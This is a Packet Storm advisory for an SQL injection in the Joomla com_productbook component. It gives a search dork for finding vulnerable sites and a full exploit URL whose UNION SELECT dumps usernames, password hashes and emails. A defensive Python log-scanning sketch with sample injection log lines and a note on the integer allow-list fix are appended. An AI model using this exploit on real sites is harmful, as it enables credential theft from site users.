Joomla Productbook SQL Injection

2010-02-08T00:00:00
ID PACKETSTORM:86032
Type packetstorm
Reporter Snakespc
Modified 2010-02-08T00:00:00

Description

                                        
`Joomla Component "com_productbook" SQL Injection Vulnerability  
========================================================  
  
####################################################################  
.:. Author : Snakespc  
.:. Home : sec-war.com/cc  
.:. Script : Joomla  
.:. Bug Type : SQL Injection   
.:. Dork : inurl:"com_productbook"  
  
####################################################################  
  
===[ Exploit ]===  
  
www.site.com/index.php?option=com_productbook&Itemid=97&func=detail&id=-73+UNION all SELECT 1,2,3,concat(username,0x3a,password,0x3a,email),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,57,58+from+condev.jos_users--  
  
####################################################################  
`
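
Detection sketch for the request pattern above, added here as an example and not part of the original advisory: it scans web access logs for `com_productbook` requests whose `id` or `Itemid` value is not a plain integer. The log lines, the function name `find_suspicious` and the assumption that both parameters are integer-only (as they appear in the advisory URL) are constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Constructed sample access-log lines (combined log format), not taken from the advisory.
SAMPLE_LOG = """\
198.51.100.7 - - [08/Feb/2010:10:01:02 +0000] "GET /index.php?option=com_productbook&Itemid=97&func=detail&id=73 HTTP/1.1" 200 5120
198.51.100.9 - - [08/Feb/2010:10:01:09 +0000] "GET /index.php?option=com_productbook&Itemid=97&func=detail&id=-73+UNION+all+SELECT+1,2,3-- HTTP/1.1" 200 4876
198.51.100.9 - - [08/Feb/2010:10:01:15 +0000] "GET /index.php?option=com_productbook&func=detail&id=-73%20UnIoN%2F**%2FSeLeCt%201 HTTP/1.1" 200 4876
203.0.113.4 - - [08/Feb/2010:10:02:00 +0000] "GET /index.php?option=com_content&view=article&id=12:about HTTP/1.1" 200 9000
"""

# Client address, then the request target inside the quoted request line.
REQUEST_RE = re.compile(r'^(\S+) .*?"[A-Z]+ (.+?) HTTP/[\d.]+"')

# Assumption: these parameters only ever carry integers for this component.
NUMERIC_PARAMS = ("id", "Itemid")


def find_suspicious(log_text):
    """Return (client, param, decoded_value) for every non-integer value
    sent to com_productbook in a parameter expected to be numeric."""
    hits = []
    for line in log_text.splitlines():
        m = REQUEST_RE.match(line)
        if not m:
            continue
        client, target = m.groups()
        # parse_qs URL-decodes values, so %20 and + obfuscation is normalised.
        query = parse_qs(urlsplit(target).query, keep_blank_values=True)
        # Scope to the affected component; other components (for example
        # com_content with "id=12:about") legitimately use non-integer ids.
        if "com_productbook" not in (v.lower() for v in query.get("option", [])):
            continue
        for name in NUMERIC_PARAMS:
            for value in query.get(name, []):
                # Allow-list check: anything other than ASCII digits is flagged,
                # so no SQL keyword signatures are needed.
                if not re.fullmatch(r"[0-9]+", value):
                    hits.append((client, name, value))
    return hits


if __name__ == "__main__":
    for client, name, value in find_suspicious(SAMPLE_LOG):
        print(f"{client} sent non-integer {name}: {value!r}")
```

The same allow-list rule (accept digits only) is the server-side fix for this class of bug: validate or cast the parameter to an integer before it reaches the query, or bind it as a query parameter.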